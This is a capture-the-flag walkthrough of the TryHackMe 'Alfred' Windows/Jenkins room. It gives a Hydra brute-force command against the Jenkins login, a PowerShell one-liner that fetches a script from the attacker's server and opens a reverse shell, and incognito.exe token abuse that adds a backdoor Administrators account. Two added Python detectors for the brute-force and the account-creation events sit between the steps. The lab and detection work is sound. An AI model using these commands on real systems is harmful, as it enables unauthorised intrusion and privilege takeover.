TryHackMe — Alfred w/o MSF

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.


[1]NMAP Scan

sudo nmap -A -T4 10.10.131.184 -oN nmap_alfred


[2]Visit Webpage

http://10.10.131.184:8080


[3]Brute force login page

Capture the login request using Burp Suite:


Brute-force the http-post-form using Hydra:

Parameters for Hydra:

URL: /j_acegi_security_check
USER = j_username
PASS = j_password
Port = 8080
Invalid login message = Invalid username or password

hydra -s 8080 10.10.131.184 http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password" -L user.txt -P rockyou.txt -t 10 -w 30
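The Hydra run above hits the Jenkins login form with many POSTs per second from a single source address, and that request rate is what a defender can key on. The detector below is an added example and not code from the TryHackMe room or the original write-up: it parses reverse-proxy access log lines in the Apache/nginx combined format (the sample lines are constructed) and flags any client whose POSTs to /j_acegi_security_check exceed a threshold inside a sliding time window.

```python
"""Flag brute-force bursts against the Jenkins login endpoint in an access log.

Added example, not code from the TryHackMe room or the original write-up.
Assumptions (labelled): Jenkins sits behind a reverse proxy that writes
Apache/nginx "combined"-format lines, and the sample lines below are
constructed to mimic a Hydra run next to one ordinary user.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/j_acegi_security_check"

# ip ident user [timestamp] "METHOD path proto" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT),
            m["method"], m["path"], int(m["status"]))


def find_bruteforce_sources(lines, threshold=10, window_seconds=60):
    """Return {ip: peak_attempts} for clients whose POSTs to LOGIN_PATH exceed
    `threshold` inside any sliding window of `window_seconds`.

    Every POST to the endpoint is counted regardless of status code: the
    request rate itself is the signal, and it is visible before any guess
    succeeds.
    """
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs in the window
    peak = defaultdict(int)
    span = timedelta(seconds=window_seconds)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue               # malformed line: skip, never crash the detector
        ip, ts, method, path, _status = rec
        if method != "POST" or path.split("?", 1)[0] != LOGIN_PATH:
            continue
        window = recent[ip]
        window.append(ts)
        while window and ts - window[0] > span:
            window.popleft()       # drop attempts that fell out of the window
        peak[ip] = max(peak[ip], len(window))
    return {ip: n for ip, n in peak.items() if n > threshold}


# Constructed sample: twelve login POSTs in 22 seconds from one client
# (the Hydra pattern), one normal login from another client, and one junk line.
SAMPLE_LOG = [
    f'10.11.17.48 - - [12/Oct/2020:09:00:{s:02d} +0000] '
    f'"POST {LOGIN_PATH} HTTP/1.1" 302 0'
    for s in range(0, 24, 2)
] + [
    '192.0.2.10 - - [12/Oct/2020:09:00:05 +0000] "GET /login HTTP/1.1" 200 1834',
    f'192.0.2.10 - - [12/Oct/2020:09:00:09 +0000] "POST {LOGIN_PATH} HTTP/1.1" 302 0',
    'not an access-log line',
]

if __name__ == "__main__":
    for ip, n in find_bruteforce_sources(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs inside one 60s window")
```

The threshold is deliberately on request count rather than on failures, because the Hydra invocation above runs ten parallel tasks and produces the burst whether or not a password matches; a production rule would pair this with the 302-to-/loginError responses Jenkins returns on failure and with an allow-list for known CI clients.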


[4]Login to webpage using gathered credentials


[5]Set up a Python web server and a netcat listener on Kali


[6]Download and run Invoke-PowerShellTcp.ps1 on the target machine

powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.17.48:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.17.48 -Port 1337


[7]Escalate privilege

whoami /priv

[8]Exploit SeImpersonatePrivilege using incognito.exe

powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.11.17.48:8000/incognito.exe','incognito.exe')"

./incognito.exe add_user dummy pass123

./incognito.exe add_localgroup_user Administrators dummy

[9]Login to RDP using dummy account

rdesktop -u dummy -p pass123 10.10.131.184


Run cmd as Administrator.
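The incognito steps above leave a distinctive trail in the Windows Security log: a user account is created (event 4720) and, seconds later, a member is added to a security-enabled local group (event 4732) by the same subject. The correlation below is an added example and not code from the TryHackMe room or the original write-up; it assumes the events have already been exported into dicts that keep the standard EventData field names, and the sample events, the 'jenkins-svc' subject and the SIDs in them are constructed.

```python
"""Correlate Windows Security events for the local-admin backdoor pattern:
a user account is created (event 4720) and then added to Administrators
(event 4732) by the same subject within a short interval.

Added example, not code from the TryHackMe room or the original write-up.
Assumptions (labelled): events were already exported from the Security log
into dicts that keep the EventData field names (SubjectUserName,
TargetUserName, TargetSid, MemberName, MemberSid) plus a parsed TimeCreated.
The sample events, the 'jenkins-svc' subject and the SIDs are constructed.
"""
from datetime import datetime, timedelta

EVENT_USER_CREATED = 4720               # "A user account was created"
EVENT_LOCAL_GROUP_MEMBER_ADDED = 4732   # "A member was added to a security-enabled local group"
ADMIN_GROUPS = {"Administrators"}


def correlate_backdoor_admins(events, max_gap_minutes=10):
    """Return one finding per new account that was created and then added to
    an admin group by the same subject within `max_gap_minutes`.

    4732 may identify the member by SID only (MemberName "-"), so a creation
    record matches on either TargetSid or the account name.
    """
    pending = []    # unmatched 4720 records: (time, subject, name, sid)
    findings = []
    gap = timedelta(minutes=max_gap_minutes)
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] == EVENT_USER_CREATED:
            pending.append((ev["TimeCreated"], ev["SubjectUserName"],
                            ev["TargetUserName"].lower(), ev.get("TargetSid")))
        elif (ev["EventID"] == EVENT_LOCAL_GROUP_MEMBER_ADDED
              and ev["TargetUserName"] in ADMIN_GROUPS):   # TargetUserName is the group here
            member_sid = ev.get("MemberSid")
            member_name = ev.get("MemberName", "-").split("\\")[-1].lower()
            for rec in list(pending):
                t_created, subject, name, sid = rec
                if ev["TimeCreated"] - t_created > gap:
                    pending.remove(rec)     # too old to belong to the same chain
                    continue
                same_account = (sid is not None and sid == member_sid) or name == member_name
                if subject == ev["SubjectUserName"] and same_account:
                    findings.append({
                        "subject": subject,
                        "new_admin": name,
                        "group": ev["TargetUserName"],
                        "seconds_between": (ev["TimeCreated"] - t_created).total_seconds(),
                    })
                    pending.remove(rec)
                    break
    return findings


def _at(hour, minute, second):
    return datetime(2020, 10, 12, hour, minute, second)


# Constructed sample events (simplified EventData; SIDs are placeholders).
SAMPLE_EVENTS = [
    # Helpdesk creates a user and never touches admin groups: benign.
    {"EventID": 4720, "TimeCreated": _at(8, 15, 0), "SubjectUserName": "helpdesk",
     "TargetUserName": "jsmith", "TargetSid": "S-1-5-21-PLACEHOLDER-1010"},
    # The write-up's chain: a service account creates 'dummy' and, 21 s later,
    # drops it into Administrators.
    {"EventID": 4720, "TimeCreated": _at(9, 42, 10), "SubjectUserName": "jenkins-svc",
     "TargetUserName": "dummy", "TargetSid": "S-1-5-21-PLACEHOLDER-1011"},
    {"EventID": 4732, "TimeCreated": _at(9, 42, 31), "SubjectUserName": "jenkins-svc",
     "TargetUserName": "Administrators", "MemberName": "-",
     "MemberSid": "S-1-5-21-PLACEHOLDER-1011"},
    # An existing account promoted later with no matching creation: not flagged.
    {"EventID": 4732, "TimeCreated": _at(10, 5, 0), "SubjectUserName": "helpdesk",
     "TargetUserName": "Administrators", "MemberName": "ALFRED\\itadmin",
     "MemberSid": "S-1-5-21-PLACEHOLDER-1003"},
]

if __name__ == "__main__":
    for f in correlate_backdoor_admins(SAMPLE_EVENTS):
        print(f"{f['subject']} created {f['new_admin']} and added it to "
              f"{f['group']} after {f['seconds_between']:.0f}s")
```

Both events require the "Audit User Account Management" and "Audit Security Group Management" subcategories to be enabled; the rule is most useful when the subject is a service account such as the one Jenkins runs under, which has no business creating users at all.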


References:

https://tryhackme.com/room/alfred

https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip
